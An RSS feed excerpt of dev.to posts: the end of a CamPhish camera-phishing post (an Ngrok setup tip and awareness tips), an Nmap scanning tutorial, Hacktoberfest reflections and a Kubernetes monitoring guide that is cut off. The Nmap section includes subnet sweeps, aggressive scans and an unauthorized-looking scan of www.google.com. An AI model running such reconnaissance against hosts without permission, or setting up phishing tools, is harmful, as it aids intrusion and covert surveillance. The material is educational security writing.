&lt;em&gt;Images&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Note
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Install Ngrok directly from the official site instead of using the initially downloaded inbuilt Ngrok. Upon running CamPhish for the first time, delete the existing Ngrok files. Download the executable file from the official Ngrok site and move it to the CamPhish folder. This step is necessary due to issues with the inbuilt Ngrok, ensuring the proper functioning of the tool.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Recognize how simple it is to compromise someone’s camera? Stay vigilant against cybercrime and scams, and make sure to educate your parents or friends on these potential threats. This knowledge will help safeguard them from falling victim to cyber-attacks, especially since older and non-technical individuals are often targeted.&lt;/p&gt;

&lt;h3&gt;
  
  
  Safety and tips:
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Be Skeptical of Unsolicited Communications:&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Be cautious of unexpected emails, messages, or social media requests, especially if they contain urgent or alarming messages.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Sender Information:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Double-check the sender’s email address or contact details. Legitimate organizations usually have official and recognizable communication channels.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3. Don’t Click on Suspicious Links:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Avoid clicking on links in emails or messages from unknown sources. Hover over links to preview the URL before clicking.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;4. Use Two-Factor Authentication (2FA):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Enable 2FA whenever possible to add an extra layer of security to your accounts.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;5. Keep Software and Systems Updated:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Regularly update your operating system, antivirus software, and other applications to patch vulnerabilities.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;6. Educate Yourself and Others:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Stay informed about common phishing tactics and educate friends and family members to recognize and avoid potential threats.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;7. Use Reliable Security Software:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Install and regularly update reputable antivirus and anti-malware software to detect and block phishing attempts.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;8. Be Wary of Requests for Personal Information:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Avoid sharing sensitive information such as passwords, credit card details, or social security numbers through email or unfamiliar websites.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;9. Check Website Security:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Before entering personal information on a website, ensure the site is secure. Look for “https://” in the URL and check for a padlock symbol.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;10. Trust Your Instincts:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If something feels off or too good to be true, it probably is. Trust your instincts and proceed with caution.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;By following these tips, you can significantly reduce the risk of falling victim to phishing attempts and enhance your overall online security.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>hacking</category>
      <category>security</category>
    </item>
    <item>
      <title>Mastering Nmap: Essential Commands and Examples for Network Security</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Sun, 05 Nov 2023 06:51:33 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/mastering-nmap-essential-commands-and-examples-for-network-security-2128</link>
      <guid>https://dev.to/kamaleshseervi/mastering-nmap-essential-commands-and-examples-for-network-security-2128</guid>
      <description>&lt;p&gt;Discover the Power of Nmap Scanning and Enumeration Techniques to Strengthen Your Network Defense&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s---9yhZY3H--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/540/1%2AMvmx0GkCTkCR-qN_zj96vg.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s---9yhZY3H--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/540/1%2AMvmx0GkCTkCR-qN_zj96vg.jpeg" alt="" width="540" height="245"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What is Nmap?
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Nmap stands for Network Mapped (Nmap) and is a network scanning and host detection tool that is very useful during several steps of penetration testing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Nmap is open source and can be used to:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Detect the live host on the network (host discovery)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Detect the open ports on the host (port discovery or enumeration)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Detect the software and the version to the respective port (service discovery)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Detect the operating system, hardware address, and the software version&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Detect the vulnerability and security holes (Nmap scripts)&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Nmap Syntax:
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap [scan type] [options] [target specification]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Nmap Scan types:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;TCP SCAN&lt;/li&gt;
&lt;li&gt;UDP SCAN&lt;/li&gt;
&lt;li&gt;SYN SCAN&lt;/li&gt;
&lt;li&gt;ACK SCAN&lt;/li&gt;
&lt;li&gt;FIN SCAN&lt;/li&gt;
&lt;li&gt;NULL SCAN&lt;/li&gt;
&lt;li&gt;XMAS SCAN&lt;/li&gt;
&lt;li&gt;RPC SCAN&lt;/li&gt;
&lt;li&gt;IDLE SCAN&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Before delving into advanced Nmap concepts, let’s first explore the fundamentals of NSlookup. NSlookup is a command-line tool used to query DNS servers and retrieve information about domain names. To illustrate, consider the following example:&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;NSlookup&lt;/strong&gt; is a command-line tool for querying DNS servers to retrieve information about domain names, such as their associated IP addresses.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt; To find the IP address of a domain, you can use NSlookup like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nslookup google.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--bc2K1Vl8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ApvBSrkdEJUTigID0p6yXFQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--bc2K1Vl8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ApvBSrkdEJUTigID0p6yXFQ.png" alt="" width="800" height="570"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;O/P&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Following our exploration of NSlookup, we’ll now transition to Nmap, an advanced network scanning tool. We’ll begin by discussing Nmap’s core concepts and provide an example to illustrate its functionality.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Nmap — Advanced Scanning (Best practices)
&lt;/h3&gt;

&lt;h4&gt;
  
  
  1. Scanning and Logging Network Data with Nmap
&lt;/h4&gt;

&lt;p&gt;In the provided Nmap command, several options and parameters are used to perform a network scan and save the results:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;nmap: This is the command itself, invoking the Nmap tool.&lt;/li&gt;
&lt;li&gt;-oG -: This option instructs Nmap to generate output in the "grepable" format and sends it to the standard output (stdout).&lt;/li&gt;
&lt;li&gt;192.168.29.238: This is the target IP address (or hostname) you want to scan. Nmap will perform its scanning and testing on this target.&lt;/li&gt;
&lt;li&gt;-vv: The -v option stands for "verbose." Using it twice (-vv) increases the verbosity level, providing more detailed information during the scan.&lt;/li&gt;
&lt;li&gt;&amp;gt; Desktop/results: The &amp;gt; symbol is used to redirect the output of the Nmap command to a file named "results" on the desktop. This will create a file containing the scan results in the current user's Desktop directory.
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -oG - &amp;lt;ip&amp;gt; -vv &amp;gt; Desktop/results
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--bfbchGfL--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AxJFd1ueXRtivLPvZ4Gcrxw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--bfbchGfL--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AxJFd1ueXRtivLPvZ4Gcrxw.png" alt="" width="800" height="813"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;O/P&lt;/em&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  2. Scanning Particular with Nmap
&lt;/h4&gt;

&lt;p&gt;This Nmap command is designed to perform an extensive network scan targeting a range of IP addresses and specifically focusing on particular port services:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;nmap: This is the Nmap command to initiate network scanning.&lt;/li&gt;
&lt;li&gt;-oG -: The -oG option instructs Nmap to generate output in the "grepable" format, while the hyphen - indicates that the output should be sent to the standard output (stdout).&lt;/li&gt;
&lt;li&gt;192.168.29.0-255: This specifies a range of IP addresses from 192.168.29.0 to 192.168.29.255. The scan will be conducted on all IP addresses within this range.&lt;/li&gt;
&lt;li&gt;-p 22: The -p option is used to specify the port number to scan, and in this case, it's set to 22. Port 22 is the default port for SSH (Secure Shell), a protocol used for secure remote access to system.&lt;/li&gt;
&lt;li&gt;-vv: The -v option is for "verbose" mode, and using it twice (-vv) increases the verbosity, providing detailed information during the scan.&lt;/li&gt;
&lt;li&gt;&amp;gt; Desktop/results: The &amp;gt; symbol is used to redirect the output of the Nmap command to a file named "results" on the desktop.
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt; nmap -oG - &amp;lt;ip&amp;gt;-&amp;lt;range&amp;gt; -p 22 -vv &amp;gt; Desktop/results
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--dL-zbgiI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AL-mH5sEd9Om23ZHXtS9OCA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--dL-zbgiI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AL-mH5sEd9Om23ZHXtS9OCA.png" alt="" width="800" height="269"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;O/P&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Nmap — Aggressive Scanning
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;This Nmap command performs an “Aggressive” scan on the target “scanme.nmap.org.” The -A option in the command instructs Nmap to enable version detection, script scanning, and traceroute to provide a more detailed and comprehensive assessment of the target system. "scanme.nmap.org" is a service provided by Nmap that allows users to test their Nmap scanning skills on a safe and controlled target. The result of this scan will include information about open ports, services, operating system details, and potential vulnerabilities, making it an extensive reconnaissance effort.
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -A scanme.nmap.org
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s---h7PPnBW--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AGGJ8gMlGFnqSto757XZ1UQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s---h7PPnBW--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AGGJ8gMlGFnqSto757XZ1UQ.png" alt="" width="800" height="484"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;-A (aggressive scan)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2.&lt;/strong&gt; The Nmap below command is used to perform a version detection scan on the target "scanme.nmap.org." Here's an explanation of the command:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;-sV: The -sV option is used to enable version detection during the scan. When this option is included, Nmap attempts to determine the version of the services running on the target by analyzing their responses to various probes. This can help identify not only the service but also the specific version of the service (e.g., Apache 2.4.7).
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sV scanme.nmap.org
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--3lhRvnfb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AZAV8uladB_JeeIQnrPMgYA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--3lhRvnfb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AZAV8uladB_JeeIQnrPMgYA.png" alt="" width="800" height="338"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;-sV (Services)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3.&lt;/strong&gt; The Nmap below command is used to perform a fast scan on the target "scanme.nmap.org." Here's an explanation of the command:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;-F: The -F option is a shorthand for the "fast" scan mode. When you use this option, Nmap performs a quick scan focused on identifying the most common open ports and their associated services. This is also known as a "fast scan" or a "top 1000 ports" scan, and it's designed to be less time-consuming than a comprehensive scan.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -F scanme.nmap.org
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--XmCL0xWY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AnjXj1kivl-rYDudQnATVfQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--XmCL0xWY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AnjXj1kivl-rYDudQnATVfQ.png" alt="" width="800" height="338"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;-F (fast mode)&lt;/em&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The Nmap below command is used to scan the target "&lt;a href="http://www.google.com/"&gt;www.google.com&lt;/a&gt;" while displaying only the open ports. Here's an explanation of the command:&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
&lt;li&gt;--open: The --open option instructs Nmap to display only the open ports and services discovered during the scan. This means that it will filter out closed or filtered ports from the scan results, providing a concise list of the open ports that are actively accepting connections.&lt;/li&gt;
&lt;li&gt;
&lt;a href="http://www.google.com:"&gt;www.google.com:&lt;/a&gt; This is the target hostname or domain name, in this case, "&lt;a href="http://www.google.com/"&gt;www.google.com&lt;/a&gt;." The scan is performed on Google's web servers.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap --open www.google.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--qDWcNMAN--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AvX7MIDshEG4xXUsdVb7SNw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--qDWcNMAN--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AvX7MIDshEG4xXUsdVb7SNw.png" alt="" width="800" height="300"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;— open (shows open ports)&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Resources:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://nmap.org/download.html"&gt;Download the Free Nmap Security Scanner for Linux/Mac/Windows&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://hackersploit.org/"&gt;HackerSploit Blog&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>pentesting</category>
      <category>hacking</category>
      <category>security</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Hacktoberfest 2023 Pledge</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Wed, 25 Oct 2023 14:57:22 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/hacktoberfest-2023-pledge-a2a</link>
      <guid>https://dev.to/kamaleshseervi/hacktoberfest-2023-pledge-a2a</guid>
      <description>&lt;p&gt;Officially registered for #Hacktoberfest2023!&lt;/p&gt;

&lt;p&gt;Looking forward to discovering awesome repositories and contributing new features and fixes.&lt;/p&gt;

&lt;p&gt;Tags: &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;webdev&lt;/li&gt;
&lt;li&gt;beginners&lt;/li&gt;
&lt;li&gt;opensource&lt;/li&gt;
&lt;li&gt;hacktoberfest23&lt;/li&gt;
&lt;li&gt;Hacktoberfest2023&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>hacktoberfest23</category>
    </item>
    <item>
      <title>Hacktoberfest2023</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Wed, 25 Oct 2023 14:54:29 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/placeholder-contributor-10jn</link>
      <guid>https://dev.to/kamaleshseervi/placeholder-contributor-10jn</guid>
      <description>&lt;h2&gt;
  
  
  Intro
&lt;/h2&gt;

&lt;p&gt;Hello, I'm Kamalesh Seervi, and I'm excited to share my experience with Hacktoberfest 2023. This is my first Hacktoberfest; I've have participated in this event for first time. You can find my contributions on my &lt;a href="https://github.com/kamalesh-seervi"&gt;GitHub profile&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Highs and Lows
&lt;/h2&gt;

&lt;p&gt;This Hacktoberfest had its fair share of highs and lows. One of the biggest accomplishments for me was successfully contributing to an open-source project that I've been following for a long time. It was a light-bulb moment because I had always thought contributing to this project was beyond my capabilities, but with determination and guidance from the project maintainers, I was able to make meaningful contributions.&lt;/p&gt;

&lt;p&gt;However, there were also some challenges during the month. I encountered a complex issue in one of the projects I was contributing to. It seemed impossible to fix at first, and I was frustrated. But instead of giving up, I decided to reach out to the project's community for help. This experience taught me the importance of seeking assistance and collaborating with others in the open-source community. Eventually, we solved the issue together, which was a valuable learning experience.&lt;/p&gt;

&lt;h2&gt;
  
  
  Growth
&lt;/h2&gt;

&lt;p&gt;Before Hacktoberfest 2023, my skillset was primarily centered around web development and a bit of scripting. However, during this month, I expanded my knowledge and skills. I delved into the world of open-source contributions, which included working on projects in various programming languages, like Python, JavaScript, and even C++. I improved my understanding of version control systems, code review processes, and collaborating with a diverse group of developers.&lt;/p&gt;

&lt;p&gt;My learning and career goals have evolved as well. I've realized the importance of giving back to the open-source community, and I plan to continue contributing to projects that align with my interests. This experience has opened up new opportunities for me, and I'm considering a shift towards a more open-source-centric career path. Hacktoberfest 2023 has been a transformative journey, and I'm looking forward to the continued growth and learning that open source has to offer.&lt;/p&gt;

</description>
      <category>hack23contributor</category>
    </item>
    <item>
      <title>Setting up Prometheus and Grafana Integration on Kubernetes with Helm</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Sun, 22 Oct 2023 15:45:45 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/setting-up-prometheus-and-grafana-integration-on-kubernetes-with-helm-4p5o</link>
      <guid>https://dev.to/kamaleshseervi/setting-up-prometheus-and-grafana-integration-on-kubernetes-with-helm-4p5o</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--_xIuUbSX--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A7UZ2JxZaYH7xxZGTWoQ4eQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--_xIuUbSX--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A7UZ2JxZaYH7xxZGTWoQ4eQ.png" alt="" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;In this comprehensive guide, you will gain insight into the process of seamlessly integrating Prometheus and Grafana within your Kubernetes environment using Helm. Furthermore, you’ll discover how to construct a straight forward dashboard in Grafana. Prometheus and Grafana stand as two highly favored open-source monitoring solutions for Kubernetes.&lt;/p&gt;

&lt;p&gt;Acquiring the skill to deploy them via Helm empowers you to efficiently oversee your Kubernetes cluster and swiftly resolve issues. This proficiency will also deepen your comprehension of your cluster’s overall health and performance, allowing you to diligently monitor resource allocation and performance metrics in your Kubernetes environment.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  Prerequisites
&lt;/h4&gt;

&lt;p&gt;To get started with this guide, make sure you have the following prerequisites:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Docker Installation:&lt;/strong&gt; Follow the official Docker documentation to install Docker on your machine.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kubectl Installation:&lt;/strong&gt; Install Kubectl on your local machine for communication with your Kubernetes cluster. Refer to the official Kubectl documentation for guidance.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Basic Kubernetes Knowledge:&lt;/strong&gt; It’s helpful to have some fundamental knowledge of Kubernetes. You can either consult the Kubernetes official documentation or access Semaphore’s free ebook titled “CI/CD with Docker and Kubernetes,” which doesn’t require prior Docker or Kubernetes expertise.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kubernetes Cluster Setup:&lt;/strong&gt; You’ll be deploying Prometheus and Grafana on your Kubernetes cluster. In this guide, we’ll use Minikube, a free local Kubernetes cluster. Alternatively, you can opt for managed cloud-based Kubernetes services such as Google Kubernetes Engine (GKE), Azure Kubernetes Service (AKS), Amazon Elastic Kubernetes Service (EKS), or DigitalOcean Kubernetes Service (DOKS). Keep in mind that some of these cloud-based services may involve a cost, while others offer free plans.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;By meeting these prerequisites, you’ll be ready to integrate Prometheus and Grafana seamlessly into your Kubernetes environment.&lt;/p&gt;

&lt;h4&gt;
  
  
  What is Prometheus?
&lt;/h4&gt;

&lt;p&gt;Prometheus stands as an open-source DevOps utility, offering robust monitoring and real-time alerting features tailor-made for container orchestration platforms like Kubernetes. This tool excels in collecting and storing metrics as time series data, making it an ideal choice for tracking and analyzing platform performance. One of its standout attributes is its innate ability to monitor the container orchestration platform, making it an invaluable data source for various data visualization libraries, including Grafana.&lt;/p&gt;

&lt;p&gt;The metrics Prometheus captures from the Kubernetes cluster encompass:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Health status of the Kubernetes cluster.&lt;/li&gt;
&lt;li&gt;CPU utilization statistics.&lt;/li&gt;
&lt;li&gt;Memory consumption metrics.&lt;/li&gt;
&lt;li&gt;Node status within the Kubernetes infrastructure.&lt;/li&gt;
&lt;li&gt;Insights into potential performance bottlenecks.&lt;/li&gt;
&lt;li&gt;Performance metrics.&lt;/li&gt;
&lt;li&gt;Resource allocation and utilization across server components.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;In essence, Prometheus plays a pivotal role in ensuring the health and performance of a Kubernetes cluster, making it an essential tool for DevOps and system administrators.&lt;/p&gt;

&lt;h4&gt;
  
  
  What is Grafana?
&lt;/h4&gt;

&lt;p&gt;Grafana is a versatile, open-source tool for visualizing data. When it’s connected to data sources like Prometheus, it offers features like interactive dashboards, charts, graphs, and web alerts. You can use Grafana to view and understand your data from various sources, not just Prometheus, including InfluxDB, Azure Monitor, and others.&lt;/p&gt;

&lt;p&gt;You can build your own dashboards or use pre-made ones and customize them as needed. Many DevOps professionals use Grafana and Prometheus to create powerful databases and visual displays for tracking data over time. In this guide, we’ll show you how to make a dashboard for visualizing metrics from Prometheus.&lt;/p&gt;

&lt;h4&gt;
  
  
  Choosing the Right Deployment Method for Prometheus and Grafana Integration on Kubernetes
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Manual Kubernetes Deployment:&lt;/strong&gt; In this method, you’re required to create Kubernetes Deployment and Services YAML files for both Prometheus and Grafana. These YAML files must include all the necessary configurations to enable integration with Kubernetes. Subsequently, you deploy these files to your Kubernetes cluster to make Prometheus and Grafana operational. This process may result in multiple YAML files, which can be somewhat burdensome for many DevOps professionals. Additionally, a single mistake in any YAML file can impede the integration of Prometheus and Grafana on Kubernetes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Using Helm:&lt;/strong&gt; This stands out as the simplest and most convenient method for deploying applications in containers to Kubernetes. Helm serves as the official package manager for Kubernetes and streamlines the installation, deployment, and management of Kubernetes applications. Helm packages and encapsulates the Kubernetes application within a Helm Chart. A Helm Chart encompasses all the essential YAML files, including Deployments, Services, Secrets, and ConfigMaps manifests. These files are instrumental in deploying the application container in Kubernetes. Instead of crafting individual YAML files for each application container, Helm offers the convenience of downloading pre-existing Helm charts that come equipped with the necessary manifest YAML files.&lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  Installing Helm
&lt;/h4&gt;

&lt;p&gt;Before you install Helm, you must start your Minikube Kubernetes using the following command:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Installing Helm on macOS
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;brew install helm
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Installing Helm on Linux
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo apt-get install helm
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Installing Helm on Windows
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;choco install Kubernetes-helm
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Helm Commands
&lt;/h4&gt;

&lt;p&gt;To get all the Helm commands, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;helm
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The command output:&lt;/p&gt;

